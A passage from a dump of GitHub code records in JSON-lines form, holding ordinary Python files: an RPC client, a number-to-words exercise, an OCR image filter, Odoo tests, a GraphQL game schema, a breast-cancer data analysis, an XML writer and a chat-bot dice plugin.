key, connection_item = self.queue.get()\n            log.debug((key, connection_item))\n            if key not in self.waiting:\n                continue\n\n            self._off_waiting_timeout(key)\n            self.active[key] = connection_item\n            self._handle_connection_item(connection_item, functools.partial(self._release_connection_item, key))\n\n    def _release_connection_item(self, key):\n        del self.active[key]\n        self._run_item()\n\n    def _handle_connection_item(self, connection_item, release_callback):\n        connection_item.set_release_callback(release_callback)\n        # self._io_loop.run_sync(functools.partial(self._on_sending, connection_item))\n        _sending_future = self._on_sending(connection_item)\n        self._io_loop.add_future(_sending_future, lambda f: f.result())\n\n    @gen.coroutine\n    def _on_sending(self, connection_item):\n        try:\n\n            #: send request\n            self._sending_connection_item(connection_item)\n            content = yield self._read_message(connection_item)\n            log.debug(content)\n\n        except Exception:\n            traceback.print_exc()\n\n    def _sending_connection_item(self, connection_item):\n        log.debug((\"_send_request\", connection_item.item.__dict__))\n        self.connection.communicate(connection_item.item)\n\n    @gen.coroutine\n    def _read_message(self, connection_item):\n        try:\n\n            if not self.connection.is_available_stream():\n                log.error(\"Stream closed before the response could be read\")\n                raise gen.Return(False)\n\n            #: read header data\n            header_data_future = self.connection.stream.read_until_regex(\n                regex=message_utils.header_delimiter,\n                max_bytes=connection_item.header_max_bytes\n            )\n\n            if connection_item.header_timeout is None:\n                self._header_data = yield header_data_future\n            else:\n                try:\n                    self._header_data = yield gen.with_timeout(\n                        timeout=self._io_loop.time() + connection_item.header_timeout,\n                        future=header_data_future,\n                        io_loop=self._io_loop\n                    )\n                except gen.TimeoutError:\n                    log.error(\"Timeout reading header from {}\".format(self.client_config.address_str))\n                    raise gen.Return(False)\n\n            #: parse header data\n            try:\n                header_tube = message_utils.parse_header(\n                    CONNECTION_TYPE_IN_REQUEST, self._header_data)\n\n            except RPCInputError as e:\n                log.warn(e.error)\n                raise gen.Return(False)\n\n            topic = header_tube.topic\n\n            #: read body data\n            body_data_future = self.connection.stream.read_bytes(\n                header_tube.body_len + len(message_utils.body_suffix))\n\n            if connection_item.body_timeout is None:\n                self._body_data = yield body_data_future\n            else:\n                try:\n                    self._body_data = yield gen.with_timeout(\n                        timeout=self._io_loop.time() + connection_item.body_timeout,\n                        future=body_data_future,\n                        io_loop=self._io_loop\n                    )\n                except gen.TimeoutError:\n                    log.error(\"Timeout reading body from {}\".format(self.client_config.address_str))\n                    raise gen.Return(False)\n\n            #: parse body data\n            try:\n                body_msg = message_utils.parse_body(self._body_data)\n            except RPCInputError as e:\n                log.error(e.error)\n                raise gen.Return(False)\n\n        except StreamClosedError:\n            raise gen.Return(False)\n        #: hand the parsed (topic, body) pair back to the caller\n        raise gen.Return((topic, body_msg))\n\n\nclass _ConnectionThreadingHandler(threading.Thread):\n\n    def __init__(self, func, group=None, target=None, name=None):\n        super(_ConnectionThreadingHandler, self).__init__(group=group, target=target, name=name)\n        self.func = func\n\n    def run(self):\n        self.func()\n\n\nclass ClientConnectionItem(object):\n\n    def __init__(self, item, callback, header_max_bytes=None, header_timeout=None,\n                 body_max_bytes=None, body_timeout=None, waiting_timeout=0.2):\n        assert callback is not None\n\n        self.item = item\n        self.callback = 
callback\n        self.header_max_bytes = header_max_bytes or 1 * 1024  # 1K\n        self.header_timeout = header_timeout or 10  # 10s\n        self.body_max_bytes = body_max_bytes or 10 * 1024 * 1024  # 10M\n        self.body_timeout = body_timeout\n        self.waiting_timeout = waiting_timeout  # seconds an item may wait in the queue\n\n    def set_release_callback(self, callback):\n        self._release_callback = callback\n\n\nrpc_client = RPCClient(host=\"127.0.0.1\", port=8001)\n","repo_name":"nashuiliang/xtcp","sub_path":"pyxtcp/tcp/tornado/multi_client.py","file_name":"multi_client.py","file_ext":"py","file_size_in_byte":11369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"23543254828","text":"#!/bin/python3\n\n### Exercise 3 - The Number to Words Algorithm:\n\n\ndigits = {0 : \"zero\", 1 : \"one\", 2 : \"two\", 3 : \"three\", 4 : \"four\", 5 : \"five\", 6 : \"six\", 7 : \"seven\", 8 : \"eight\", 9 : \"nine\"}\nhundreds = dict(digits) # separate copy: popping 0 below must not change digits\nbase_teens = {10 : \"ten\", 11 : \"eleven\", 12 : \"twelve\", 13 : \"thirteen\", 14 : \"fourteen\", 15 : \"fifteen\", 18 : \"eighteen\"} # 14 falls outside the derivation below and 18 cannot be spelled as \"eight\" + \"teen\"\nbase_tens = {20 : \"twenty\", 30 : \"thirty\", 40 : \"forty\", 50 : \"fifty\"}\n\nbase = {}\nbase.update(digits)\nbase.update(base_teens)\nbase.update(base_tens)\nhundreds.pop(0) # remove 0 from hundreds\n\ndef convert_single_digit(to_convert):\n    if to_convert in digits:\n        return digits[to_convert]\n\ndef convert_hundreds(to_convert):\n    if to_convert in hundreds:\n        return hundreds[to_convert]\n\ndef convert_double_digits(to_convert):\n    p1 = p2 = \"\"\n    \n    if to_convert == 0:\n        return \"\"\n    elif to_convert in base:\n        return base[to_convert]\n    else:\n        # need to derive this part of the number\n        s = str(to_convert) # convert to string\n        t = int(s[0]) # get tens digit\n        o = int(s[1]) # get ones digit\n\n        if t >= 6 and t <= 9: # 60 to 90 - these can be derived\n            if t in digits:\n                p1 = digits[t] + \"ty\" # use digit + 'ty'\n                if o != 0: \n                    p2 = convert_single_digit(o)\n                return (p1 + \" \" + p2).rstrip() # no trailing space when o == 0\n        elif t*10 in base_tens: # base numbers can't be derived, should be in the dict\n            p1 = base_tens[t*10]\n            p2 = convert_single_digit(o) # if this far then o should not be 0, i.e. 
10, 20, 30, 40, 50 should have been handled earlier\n            return p1 + \" \" + p2\n        elif t == 1: # teens not in dict, can be derived\n            if o >= 6 and o <= 9:\n                p1 = digits[o] + \"teen\" # e.g. \"six\" + \"teen\" -> \"sixteen\"\n                return p1\n\ndef num_to_string(number):\n    \n    rem = return_string = \"\"\n\n    # check for actual number that is in base and cannot be derived\n    if number in base:\n        return base[number]\n    \n    # not a number in base dict, derive number from digits\n    number_as_string = str(number) # split into digits\n    \n    if number >= 100:\n        # check hundreds\n        return_string = convert_hundreds(int(number_as_string[0])) + \" hundred\"\n        rem = convert_double_digits(int(number_as_string[1:3]))\n        if rem != \"\":\n            return_string += \" and \" + rem\n\n    if number >= 10 and number <= 99: \n        return_string = convert_double_digits(int(number_as_string[0:2]))\n\n    return return_string\n\n#main loop\nfinish = False\n\nwhile not finish:\n    \n    value = input(\"Number: \")\n    \n    if (value == \"-1\"):\n        finish = True \n    else:\n        try:\n            value = int(value)\n        except ValueError:\n            print(\"Invalid input, please try again!\")\n            continue # don't try to convert a value that wasn't a number\n\n        print(num_to_string(value)) ","repo_name":"abatista1/aws_restart","sub_path":"Python Challenge/Challenge_Labs/pce3.py","file_name":"pce3.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"16374353810","text":"from keras.models import Sequential\nfrom keras.layers import Dense, Activation\nfrom otsu_thresh import otsu\nfrom projection import project\nimport cv2\nimport sys\nimport matplotlib.pyplot as plt \nimport numpy as np \nimport keras \n\nclass Filter():\n    def __init__(self):\n        self.model = self.get_filter()\n\n    def classify(self, im):\n        ft = self.get_features(im)\n        ft = np.asarray(ft)\n        ft = ft.reshape(1, ft.shape[0])\n        pred = self.model.predict(ft)[0]\n        if np.argmax(pred) == 1:\n            return \"Text\"\n        else:\n            return \"Image\"\n\n    def get_features(self, im):\n        hist = cv2.calcHist([im],[0],None,[255],[0,255])\n        norm_hist = hist/np.max(hist)\n        var = sum(norm_hist * (np.arange(len(norm_hist)).reshape(-1, 1)))[0]\n\n        if len(im.shape) > 2:\n            im = otsu(im)\n        projection = project(im, 0)\n        num = 0 if projection[0] == 0 else 1\n        for i, p in enumerate(projection):\n            if p > 0 and projection[i-1] == 0:\n                num += 1\n        return var/1000, num\n\n    def get_filter(self):\n        model = Sequential()\n        model.add(Dense(32, input_shape=(2,)))\n        model.add(Activation('relu'))\n        model.add(Dense(2))\n        model.add(Activation('sigmoid'))\n        model.load_weights('block_filter.h5')\n        return model\n\n    def filtering(self, im):\n        thresh = 255 - otsu(im)\n        kernel = np.ones((10,10),np.uint8)\n        dilation = cv2.dilate(thresh,kernel,iterations = 1)\n        _, cnts, hierachy = cv2.findContours(dilation.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n        for c in cnts:\n            peri = cv2.arcLength(c, True)\n            approx = cv2.approxPolyDP(c, 0.1 * peri, True)\n            x,y,w,h = cv2.boundingRect(approx)\n            if w*h > 40000:\n                temp = im[y:y+h, x:x+w]\n                if self.classify(temp) == \"Image\":\n                    im[y:y+h,x:x+w] = 255\n        return im\n\nif __name__ == \"__main__\":\n    f = Filter()\n    im = cv2.imread(sys.argv[1])\n    thresh = otsu(im)\n    thresh = 255 - thresh\n\n    kernel = np.ones((10,10),np.uint8)\n    dilation = cv2.dilate(thresh,kernel,iterations = 1)\n    # opening = cv2.morphologyEx(thresh, cv2.MORPH_OPEN, kernel)\n    # dilation = 255 - dilation\n    plt.imshow(dilation, cmap='gray')\n    plt.show()\n    img = im.copy()\n    _, cnts, hierachy = cv2.findContours(dilation.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n    for c in cnts:\n        
peri = cv2.arcLength(c, True)\n        approx = cv2.approxPolyDP(c, 0.1 * peri, True)\n        x,y,w,h = cv2.boundingRect(approx)\n        if w*h > 40000:\n            im = cv2.rectangle(im,(x,y),(x+w,y+h),(0,255,0),2)\n            # temp = img[y:y+h, x:x+w]\n            # cv2.imshow(\"\", temp)\n            # cv2.waitKey()\n            # print f.get_features(temp)\n            # if f.classify(temp) == \"Image\":\n            #     im[y:y+h,x:x+w] = 255\n    \n    plt.figure(1)\n    plt.subplot(121)\n    plt.imshow(img)\n    plt.subplot(122)\n    plt.imshow(otsu(im))\n    plt.show()\n    ","repo_name":"tailongnguyen/Newspaper-Optical-Character-Recognition","sub_path":"src/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":3076,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
{"seq_id":"28723258798","text":"from DataModel.DMBase import DMBase\r\n__author__ = 'dennis'\r\n\r\nclass ScreenGroup(DMBase):\r\n    def __init__(self, id=0, name=\"\", screenOrder=0):\r\n        DMBase.__init__(self)\r\n        \r\n        self.id = id\r\n        self.name = name\r\n        self.screenOrder = screenOrder\r\n        \r\n    def fetchOne(self, id=0, screenOrder=0):\r\n        cur = self._conn.cursor()\r\n        \r\n        if screenOrder:\r\n            cur.execute(\"select * from screen_group where screenOrder=?\", (screenOrder,))\r\n        elif id:\r\n            cur.execute(\"select * from screen_group where id=?\", (id,))\r\n        else:\r\n            return\r\n        \r\n        res = cur.fetchone()\r\n        if res is None: # no matching row, leave the object unchanged\r\n            return\r\n        \r\n        self.id = res[0]\r\n        self.name = res[1]\r\n        self.screenOrder = res[2]\r\n        \r\n    def fetchall(self):\r\n\r\n        cur = self._conn.cursor()\r\n        cur.execute(\"select * from screen_group order by screenOrder ASC\")\r\n        return cur.fetchall()\r\n","repo_name":"DDecoene/OffiPOS-Stable","sub_path":"DataModel/ScreenGroup.py","file_name":"ScreenGroup.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"36067824890","text":"from odoo.tests import common\nfrom odoo.tools.safe_eval import safe_eval\n\n\nclass TestPurchaseOrderInvoiceByRef(common.TransactionCase):\n\n    def setUp(self):\n        super().setUp()\n        self.product = self.env['product.product'].create({\n            'type': 'service',\n            'company_id': False,\n            'name': 'Product test',\n            'standard_price': 10,\n        })\n        self.partner = self.env['res.partner'].create({\n            'name': 'Test partner',\n            'is_company': True,\n            'supplier': True,\n        })\n\n    def create_purchase(self, ref):\n        purchase = self.env['purchase.order'].create({\n            'partner_id': self.partner.id,\n            'partner_ref': ref,\n        })\n        line_obj = self.env['purchase.order.line']\n        line = line_obj.new({\n            'order_id': purchase.id,\n            'product_id': self.product.id,\n            'product_uom_qty': 1\n        })\n        line.onchange_product_id()\n        line['price_unit'] = 100\n        line_obj.create(line_obj._convert_to_write(line._cache))\n        purchase.button_confirm()\n        return purchase\n\n    def test_purchase_order(self):\n        refs = ['01', '*-02-*', '03...']\n        purchases = self.env['purchase.order'].browse([])\n        for ref in refs:\n            purchases |= self.create_purchase(ref)\n        self.assertEquals(len(purchases), 3)\n        wizard = self.env['purchase.order.invoice_refs'].create({\n            'partner_id': self.partner.id,\n            'references': '\\n'.join(refs),\n            'method': 'all',\n            'join_purchases': True,\n        })\n        self.assertEquals(wizard.partner_id, self.partner)\n        self.assertFalse(\n            [e for e in wizard.references_to_list() if e not in refs])\n        wizard.find_purchases()\n        self.assertEquals(wizard.partner_id, self.partner)\n        self.assertEquals(purchases, wizard.purchase_ids)\n        wizard.references = '01 \\n *-02-* \\n 03...\\n \\n \\n'\n        wizard.find_purchases()\n        
self.assertEquals(purchases, wizard.purchase_ids)\n self.assertEquals(len(wizard.line_ids), 0)\n purchase = self.create_purchase('01')\n wizard.find_purchases()\n self.assertNotEquals(purchases, wizard.purchase_ids)\n self.assertEquals(len(wizard.line_ids), 1)\n purchase.button_cancel()\n purchase.unlink()\n wizard.line_ids.unlink()\n wizard.references = '01\\n01\\n01\\n*-02-*\\n03...\\n04'\n wizard.find_purchases()\n self.assertEquals(len(wizard.references_to_list()), 6)\n self.assertEquals(purchases, wizard.purchase_ids)\n self.assertEquals(len(wizard.line_ids), 3)\n wizard.references = '01\\n*-02-*\\n03...\\n'\n wizard.action_find()\n self.assertEquals(purchases, wizard.purchase_ids)\n wizard.action_invoice()\n self.assertEquals(len(purchases[0].invoice_ids), 1)\n\n def test_purchase_order_with_taxs(self):\n tax_group_taxes = self.env.ref('account.tax_group_taxes')\n tax = self.env['account.tax'].create({\n 'name': 'Tax for purchase 10%',\n 'type_tax_use': 'purchase',\n 'tax_group_id': tax_group_taxes.id,\n 'amount_type': 'percent',\n 'amount': 10.0,\n })\n self.product.supplier_taxes_id = [(6, 0, tax.ids)]\n refs = ['01', '*-02-*', '03...']\n purchases = self.env['purchase.order'].browse([])\n for ref in refs:\n purchases |= self.create_purchase(ref)\n self.assertEquals(purchases[0].order_line.taxes_id[0], tax)\n wizard = self.env['purchase.order.invoice_refs'].create({\n 'partner_id': self.partner.id,\n 'references': '\\n'.join(refs),\n 'method': 'all',\n 'join_purchases': True,\n })\n wizard.action_find()\n self.assertEquals(purchases, wizard.purchase_ids)\n action = wizard.action_invoice()\n invoice = self.env['account.invoice'].search(\n safe_eval(action['domain']))\n self.assertEquals(len(invoice), 1)\n self.assertEquals(invoice.amount_tax, 30)\n","repo_name":"treytux/trey-addons","sub_path":"purchase_order_invoice_by_ref/tests/test_purchase_order_invoice_by_ref.py","file_name":"test_purchase_order_invoice_by_ref.py","file_ext":"py","file_size_in_byte":4107,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"40"} +{"seq_id":"6155909905","text":"import base64\n\nfrom django.core.files.base import ContentFile\nimport graphene\nfrom graphene_django import DjangoObjectType\nfrom graphql import GraphQLError\nfrom graphql_jwt.decorators import staff_member_required\nfrom .models import Game\nfrom graphene import relay\nfrom graphene_django.filter import DjangoFilterConnectionField\nfrom graphql_relay.node.node import unbase64\n\n\ndef format_cover_image_string(cover_image_url):\n file_format, image_string = cover_image_url.split(';base64,')\n ext = file_format.split('/')[-1]\n\n return ContentFile(base64.b64decode(image_string), name='game_cover_image.{}'.format(ext))\n\n\nclass GameType(DjangoObjectType):\n class Meta:\n model = Game\n\n\nclass GameNode(DjangoObjectType):\n class Meta:\n model = Game\n filter_fields = {\n 'name': ['iexact', 'icontains', 'istartswith'],\n 'id': ['exact']\n }\n interfaces = (relay.Node, )\n\n\nclass GameCoverImage(graphene.ObjectType):\n game_cover_image = graphene.String()\n\n\nclass AddGame(graphene.Mutation):\n success = graphene.Boolean()\n\n class Arguments:\n name = graphene.String(required=True)\n summary = graphene.String()\n parental_rating = graphene.String()\n developer = graphene.String()\n release_date = graphene.String()\n game_cover_image = graphene.String()\n\n @staff_member_required\n def mutate(self,\n info,\n name,\n summary=None,\n parental_rating=None,\n developer=None,\n 
release_date=None,\n               game_cover_image=None):\n        user = info.context.user\n\n        existing_game = Game.objects.filter(name=name).first()\n        if existing_game:\n            raise GraphQLError(\"A game with the same name has already been added\")\n\n        if release_date == '':\n            release_date = None\n\n        if game_cover_image == '':\n            game_cover_image = None\n\n        game = Game(\n            name=name,\n            summary=summary,\n            parental_rating=parental_rating,\n            developer=developer,\n            release_date=release_date,\n            created_by=user\n        )\n\n        if game_cover_image is not None:\n            game.game_cover_image = format_cover_image_string(game_cover_image)\n\n        game.save()\n\n        return AddGame(success=True)\n\n\nclass EditGame(graphene.Mutation):\n    success = graphene.Boolean()\n\n    class Arguments:\n        game_id = graphene.String(required=True)\n        name = graphene.String(required=True)\n        summary = graphene.String()\n        parental_rating = graphene.String()\n        developer = graphene.String()\n        release_date = graphene.String()\n        game_cover_image = graphene.String()\n        game_cover_image_updated = graphene.Boolean()\n\n    @staff_member_required\n    def mutate(self,\n               info,\n               game_id,\n               name,\n               summary=None,\n               parental_rating=None,\n               developer=None,\n               release_date=None,\n               game_cover_image=None,\n               game_cover_image_updated=False):\n        user = info.context.user\n\n        int_id = unbase64(game_id).split(':')[-1]\n        existing_game = Game.objects.filter(id=int_id).first()\n        if existing_game is None:\n            raise GraphQLError(\"The specified game doesn't exist\")\n\n        if release_date == '':\n            release_date = None\n\n        existing_game.name = name\n        existing_game.summary = summary\n        existing_game.parental_rating = parental_rating\n        existing_game.developer = developer\n        existing_game.release_date = release_date\n        existing_game.created_by = user\n\n        if game_cover_image_updated is True:\n            existing_game.game_cover_image.delete()\n            if game_cover_image is not None:\n                existing_game.game_cover_image = format_cover_image_string(game_cover_image)\n\n        existing_game.save()\n\n        return EditGame(success=True)\n\n\nclass Mutation(graphene.ObjectType):\n    add_game = AddGame.Field()\n    edit_game = EditGame.Field()\n\n\nclass Query(graphene.ObjectType):\n    game = relay.Node.Field(GameNode)\n    all_games = DjangoFilterConnectionField(GameNode)\n\n    game_cover_image = graphene.Field(GameCoverImage, game_cover_image_name=graphene.String())\n\n    def resolve_game_cover_image(self, info, game_cover_image_name=None):\n        game = Game.objects.filter(game_cover_image=game_cover_image_name).first()\n\n        if game is None:\n            raise GraphQLError(\"Could not find game with given search\")\n\n        game_cover_image = None\n        if game.game_cover_image.name is not None:\n            game_cover_image = game.game_cover_image.read()\n            game_cover_image = \"data:image/jpeg;base64,\" + str(base64.standard_b64encode(game_cover_image)).split(\"'\")[1]\n        else:\n            game_cover_image = None\n\n        return GameCoverImage(\n            game_cover_image=game_cover_image\n        )\n","repo_name":"schmeff/pgr","sub_path":"pgr/games/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":5014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"22759975182","text":"import pandas as pd\nimport scipy.stats as st\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n\nclass ResearchQuestionTwo:\n    \"\"\"\n    Runs the functions pertaining to my second research question:\n    How strong is the correlation between the demographic factors\n    (age, race, marital status) of the patient and the features of\n    the tumors (size, grade of tumor, percent 
carcinogenic)?\n How big of a role do factors outside of the tumor area correlate\n to factors within the tumor area?\n \"\"\"\n\n def __init__(self):\n '''\n Sets up the dataset needed to answer the research question.\n '''\n self.df_demographics = pd.read_csv(\n 'datasets/Breast_Cancer.csv').rename(\n columns={\n 'T Stage ': 'T Stage',\n 'Reginol Node Positive': 'Regional Node Positive',\n })\n # a column that was more descriptive than just number of nodes looked\n # at or how many carcinogenic nodes were there\n self.df_demographics[\n 'Proportion of Positive Regional Nodes'] = self.df_demographics[\n 'Regional Node Positive'] / self.df_demographics[\n 'Regional Node Examined']\n self.directory = 'research_question_two_plots/'\n\n def run(self):\n '''\n Runs through plotting both the categorical & regression plots\n needed to answer the question.\n '''\n\n self.plot_categorical()\n self.plot_regression()\n\n def plot_categorical(self):\n \"\"\"\n Plots race & marital status (categorical demographic variables)\n in comparison to features of the breast tissue.\n \"\"\"\n # tumor size vs race & marital status\n for x_var in ['Race', 'Marital Status']:\n sns.barplot(data=self.df_demographics,\n x=x_var,\n y='Tumor Size',\n hue=\"T Stage\")\n # .lower.split() for consistent naming convention on plots\n plt.savefig(self.directory +\n f'tumor_size_vs_{\"_\".join(x_var.lower().split())}.png')\n plt.clf()\n\n # age vs grade of the tumor\n sns.barplot(data=self.df_demographics, x='Grade', y='Age')\n plt.savefig(self.directory + 'age_vs_grade.png')\n plt.clf()\n\n # proportion of node examined that were positive vs\n # race & marital status\n for x_var in ['Race', 'Marital Status']:\n sns.barplot(data=self.df_demographics,\n x=x_var,\n y='Proportion of Positive Regional Nodes',\n hue=\"T Stage\")\n plt.savefig(\n self.directory +\n f'prop_+_nodes_vs_{\"_\".join(x_var.lower().split())}.png')\n plt.clf()\n\n # number of survival months vs race & marital status\n for x_var in ['Race', 'Marital Status']:\n sns.barplot(data=self.df_demographics,\n x=x_var,\n y='Survival Months')\n plt.savefig(\n self.directory +\n f'survival_months_vs_{\"_\".join(x_var.lower().split())}.png')\n plt.clf()\n\n def plot_regression(self):\n \"\"\"\n Plots age (quantitative demographic variable) with other quantitative\n features to create regression plots\n \"\"\"\n # filter to just quantitative columns that uses the 'Age' column to\n # groupby to only plot the means\n df = self.df_demographics[[\n 'Age', 'Tumor Size', 'Survival Months',\n 'Proportion of Positive Regional Nodes', 'Regional Node Examined'\n ]].groupby('Age').mean()\n\n # lists are for testing\n r_values = []\n reg_plots = []\n slopes = []\n\n # plot each of these output variables in comparison to age\n for y_var in [\n 'Proportion of Positive Regional Nodes', 'Tumor Size',\n 'Regional Node Examined', 'Survival Months'\n ]:\n\n plot = sns.regplot(data=df, x=df.index, y=y_var)\n # this is the r coefficient that determines the strength of the\n # association between the two variables\n r = st.pearsonr(df.index, df[y_var])[0]\n # statistics for testing\n r_values.append(r)\n reg_plots.append(plot)\n b = st.linregress(x=plot.get_lines()[0].get_xdata(),\n y=plot.get_lines()[0].get_ydata())[0]\n slopes.append(b)\n # adding the r coefficient to the plots\n plt.text(x=0.90,\n y=0.95,\n s=\"r: {:.2f}\".format(r),\n ha='center',\n va='top',\n transform=plt.gca().transAxes)\n name = '_'.join(y_var.lower().split())\n plt.savefig(self.directory + f'{name}_vs_age.png')\n 
plt.clf()\n\n        # return values for testing purposes\n        return df, r_values, reg_plots, slopes\n","repo_name":"Chendur87/Analyzing-Physical-and-Demographic-Factors-Impacting-Breast-Cancer-Diagnosis","sub_path":"research_question_two.py","file_name":"research_question_two.py","file_ext":"py","file_size_in_byte":5058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"4552470778","text":"import xml.etree.ElementTree as ET\nfrom typing import List as TList\n\nfrom tasks.page import NormalText, BoldText, ListItem, Column, Row, Cell, InlineElement, Link\nfrom tasks.page import Page, Header, Paragraph, List, Table\n\n\ndef write_xmlstr(page: Page, with_page_element: bool = True) -> str:\n    if page.is_empty():\n        if with_page_element:\n            return '<page/>'\n        else:\n            return ''\n\n    xml_root = _XmlCreator(page).create()\n    s = ET.tostring(xml_root, encoding='unicode')\n    assert s.startswith('<page>')\n    assert s.endswith('</page>')\n\n    if with_page_element:\n        return s\n    else:\n        return s[6:-7]  # remove <page> and </page>\n\n\ndef create_xmlroot(page: Page) -> ET.Element:\n    return _XmlCreator(page).create()\n\n\nclass _XmlCreator:\n\n    def __init__(self, page: Page):\n        self._page = page\n\n    def create(self) -> ET.Element:\n        xml_page = ET.fromstring('<page/>')\n        for block_element in self._page.block_elements:\n            self._add_xml_block_element(xml_page, block_element)\n        return xml_page\n\n    def _add_xml_block_element(self, xml_page, block_element):\n        if isinstance(block_element, Header):\n            self._add_xml_header(xml_page, block_element)\n        elif isinstance(block_element, Paragraph):\n            self._add_xml_paragraph(xml_page, block_element)\n        elif isinstance(block_element, List):\n            self._add_xml_list(xml_page, block_element)\n        elif isinstance(block_element, Table):\n            self._add_xml_table(xml_page, block_element)\n\n    def _add_xml_header(self, xml_parent, header: Header) -> None:\n        xml_header = ET.SubElement(xml_parent, 'header', level=str(header.level))\n        self._add_xml_inline_elements(xml_header, header.inline_elements)\n\n    def _add_xml_paragraph(self, xml_parent, paragraph: Paragraph) -> None:\n        if paragraph.preformatted:\n            xml_para = ET.SubElement(xml_parent, 'paragraph', preformatted='true')\n        else:\n            xml_para = ET.SubElement(xml_parent, 'paragraph')\n        self._add_xml_inline_elements(xml_para, paragraph.inline_elements)\n\n    def _add_xml_list(self, xml_parent, list_: List) -> None:\n        xml_list = ET.SubElement(xml_parent, 'list')\n        for list_item in list_.items:\n            self._add_xml_listitem(xml_list, list_item)\n\n    def _add_xml_listitem(self, xml_parent, list_item: ListItem) -> None:\n        if list_item.preformatted:\n            xml_list_item = ET.SubElement(xml_parent, 'item', symbol=list_item.symbol, preformatted='true')\n        else:\n            xml_list_item = ET.SubElement(xml_parent, 'item', symbol=list_item.symbol)\n\n        self._add_xml_inline_elements(xml_list_item, list_item.inline_elements)\n        for sub_item in list_item.sub_items:\n            self._add_xml_listitem(xml_list_item, sub_item)\n\n    def _add_xml_table(self, xml_parent, table: Table) -> None:\n        xml_table = ET.SubElement(xml_parent, 'table')\n        for col in table.columns:\n            self._add_xml_column(xml_table, col)\n        for row in table.rows:\n            self._add_xml_row(xml_table, row)\n\n    @staticmethod\n    def _add_xml_column(xml_parent, column: Column) -> None:\n        xml_col = ET.SubElement(xml_parent, 'column', halign=str(column.halign.name))\n        xml_col.text = column.text\n\n    def _add_xml_row(self, xml_parent, row: Row) -> None:\n        xml_row = ET.SubElement(xml_parent, 'row')\n        for cell in row.cells:\n            
self._add_xml_cell(xml_row, cell)\n\n def _add_xml_cell(self, xml_parent, cell: Cell) -> None:\n xml_cell = ET.SubElement(xml_parent, 'cell')\n self._add_xml_inline_elements(xml_cell, cell.inline_elements)\n\n def _add_xml_inline_elements(self, xml_block_element, inline_elements: TList[InlineElement]) -> None:\n xml_block_element.text = ''\n if len(inline_elements) == 0:\n return\n\n start_index = 0\n inline_element0 = inline_elements[0]\n if isinstance(inline_element0, NormalText):\n xml_block_element.text = inline_element0.text\n start_index = 1\n\n k = start_index\n while k < len(inline_elements):\n inline_element = inline_elements[k]\n xml_inline_element = self._add_xml_inline_element(xml_block_element, inline_element)\n if k + 1 < len(inline_elements):\n next_inline_element = inline_elements[k+1]\n if isinstance(next_inline_element, NormalText):\n xml_inline_element.tail = next_inline_element.text\n k += 1\n k += 1\n\n def _add_xml_inline_element(self, xml_block_element, inline_element: InlineElement) -> ET.SubElement:\n if isinstance(inline_element, BoldText):\n return self._add_xml_bold(xml_block_element, inline_element)\n elif isinstance(inline_element, Link):\n return self._add_xml_link(xml_block_element, inline_element)\n\n @staticmethod\n def _add_xml_bold(xml_parent, bold_text: BoldText) -> ET.SubElement:\n xml_bold = ET.SubElement(xml_parent, 'bold')\n xml_bold.text = bold_text.text\n return xml_bold\n\n @staticmethod\n def _add_xml_link(xml_parent, link: Link) -> ET.SubElement:\n xml_link = ET.SubElement(xml_parent, 'link', uri=link.uri)\n if link.text:\n xml_link.text = link.text\n return xml_link\n","repo_name":"czeppi/cc-pim","sub_path":"src/tasks/xml_writing.py","file_name":"xml_writing.py","file_ext":"py","file_size_in_byte":5399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11209195956","text":"from jieba import posseg\nfrom nonebot import (CommandSession, IntentCommand, NLPSession, on_command,\n on_natural_language)\nfrom nonebot.permission import *\n\nfrom utils_bot.typing import Callable, Generator, Union\n\nfrom .diceroll import *\n\n__plugin_name__ = '试试人品 *NL'\n__plugin_usage__ = f'''feature: 生成随机数\n可用命令:\n扔骰子, 扔骰子 []次\n扔硬币, 扔硬币 []次\n'''\n\n# help session\n@on_command('试试人品', permission=GROUP_MEMBER | SUPERUSER)\nasync def try_luck(session: CommandSession):\n await session.send(__plugin_usage__)\n\nclass random_ops:\n @staticmethod\n async def evaluate(session: CommandSession, f: Callable):\n times: int = session.get('times')\n await session.send(f(**( {'times': times} if times else {} )))\n \n @staticmethod\n def nl_proc(session: NLPSession) -> Generator[Union[str, None], None, None]:\n argsStripped: str = session.msg_text.strip()\n words = posseg.lcut(argsStripped)\n\n for word in words:\n if word.flag == 'm':\n yield word.word\n yield None\n\n@on_command('扔骰子', aliases=('扔色子', '扔个骰子', '扔个色子'), permission=GROUP_MEMBER | SUPERUSER)\nasync def roll_dice_host(session: CommandSession):\n await random_ops.evaluate(session, roll_dice_many)\n\n\n@on_command('扔硬币', aliases=('扔个硬币', '扔钢镚', '扔个钢蹦'), permission=GROUP_MEMBER | SUPERUSER)\nasync def flip_coin_host(session: CommandSession):\n await random_ops.evaluate(session, flip_coin_many)\n\n\n\n@roll_dice_host.args_parser\n@flip_coin_host.args_parser\nasync def _(session: CommandSession):\n argsStripped: str = session.current_arg_text.strip(' \\n次')\n session.state['times'] = argsStripped if argsStripped else None\n\n\n# 
